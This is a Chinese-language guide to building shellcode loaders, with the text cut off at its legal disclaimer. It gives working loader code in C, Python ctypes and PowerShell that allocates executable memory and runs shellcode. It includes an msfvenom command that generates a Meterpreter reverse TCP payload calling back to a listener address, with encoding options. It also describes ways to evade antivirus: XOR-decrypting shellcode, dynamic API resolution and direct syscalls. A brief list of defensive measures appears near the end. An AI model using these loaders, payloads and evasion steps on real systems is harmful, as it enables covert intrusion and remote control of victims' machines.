# 通用Shellcode加載器使用指南
## 目錄
1. [Shellcode基礎概念](#一shellcode基礎概念)
- 1.1 [什么是Shellcode](#11-什么是shellcode)
- 1.2 [Shellcode的典型應用場景](#12-shellcode的典型應用場景)
2. [加載器工作原理](#二加載器工作原理)
- 2.1 [內存分配與權限設置](#21-內存分配與權限設置)
- 2.2 [Shellcode執行機制](#22-shellcode執行機制)
3. [常見加載器類型](#三常見加載器類型)
- 3.1 [C/C++加載器](#31-cc加載器)
- 3.2 [Python加載器](#32-python加載器)
- 3.3 [PowerShell加載器](#33-powershell加載器)
4. [實戰操作步驟](#四實戰操作步驟)
- 4.1 [環境準備](#41-環境準備)
- 4.2 [Shellcode生成](#42-shellcode生成)
- 4.3 [加載器編寫](#43-加載器編寫)
5. [繞過防護技巧](#五繞過防護技巧)
- 5.1 [混淆技術](#51-混淆技術)
- 5.2 [間接系統調用](#52-間接系統調用)
6. [防御檢測方案](#六防御檢測方案)
7. [法律與倫理](#七法律與倫理)
8. [總結](#八總結)
---
## 一、Shellcode基礎概念
### 1.1 什么是Shellcode
Shellcode本質是一段精煉的機器碼指令,通常以十六進制數組形式存在。其名稱源于最初用于獲取系統shell的代碼,現代廣義指代任何自包含的可執行機器指令序列。
特點:
- 無PE頭結構
- 不依賴導入表
- 獨立于編譯環境
- 平均長度200-500字節
示例(x86彈窗):
```c
unsigned char shellcode[] = {
0x6A, 0x00, 0x6A, 0x00, 0x68, 0x65, 0x6C, 0x6C, 0x6F, 0x68,
0x77, 0x6F, 0x72, 0x6C, 0x64, 0x8B, 0xC4, 0x6A, 0x00, 0x50
};
關鍵API調用流程:
graph TD
A[VirtualAlloc/HeapAlloc] --> B[WriteProcessMemory]
B --> C[VirtualProtect]
C --> D[CreateThread]
參數說明: - PAGE_EXECUTE_READWRITE 權限組合 - MEM_COMMIT 內存提交方式 - 0x1000 典型分配大小
三種主要執行方式: 1. 線程創建法:CreateThread/NtCreateThreadEx 2. 回調注冊法:EnumWindows/SetTimer 3. 內存劫持法:Hijacking合法進程線程
基礎實現代碼:
#include <windows.h>
int main() {
unsigned char shellcode[] = {0x90, 0x90, 0xC3}; // NOP, NOP, RET
void *exec = VirtualAlloc(0, sizeof shellcode,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}
編譯建議:
gcc loader.c -o loader.exe -masm=intel -O0
使用ctypes示例:
import ctypes
shellcode = bytearray(b"\x90\x90\xC3")
# 分配可執行內存
ptr = ctypes.windll.kernel32.VirtualAlloc(
ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000), # MEM_COMMIT | MEM_RESERVE
ctypes.c_int(0x40) # PAGE_EXECUTE_READWRITE
)
# 寫入內存
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode))
)
# 創建線程執行
thread = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_int(thread),
ctypes.c_int(-1)
)
反射加載技術:
[Byte[]] $sc = 0x90,0x90,0xC3
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($sc.Length)
[System.Runtime.InteropServices.Marshal]::Copy($sc, 0, $mem, $sc.Length)
$func = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
$mem,
[type][IntPtr]
)
$func.Invoke()
推薦工具鏈: - 編譯器:MinGW/MSVC - 調試器:x64dbg/WinDbg - 反匯編:IDA Pro/Ghidra - 沙箱:AnyRun/Hybrid Analysis
使用MSFVenom示例:
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
-f c -o shellcode.c
關鍵參數:
- -e x86/shikata_ga_nai 編碼器
- -i 5 迭代編碼次數
- -b '\x00\x0A\x0D' 壞字符過濾
高級技巧:
// 使用函數指針規避靜態檢測
typedef void (*func_ptr)();
func_ptr sc_exec = (func_ptr) exec;
sc_exec();
// 動態解密shellcode
for(int i=0; i<sizeof(sc); i++) {
sc[i] ^= 0x55;
}
有效方法: - 字符串哈希處理 - 動態API解析 - 指令等價替換 - 花指令插入
x64直接調用示例:
mov r10, rcx
mov eax, 0x18 ; NtAllocateVirtualMemory
syscall
ret
企業級防護策略: 1. 行為監控: - 異常內存權限變更 - 遠程線程注入 2. 內存掃描: - YARA規則檢測 - 熵值分析 3. 硬件防護: - CET控制流防護 - HVCI虛擬機保護
重要聲明:
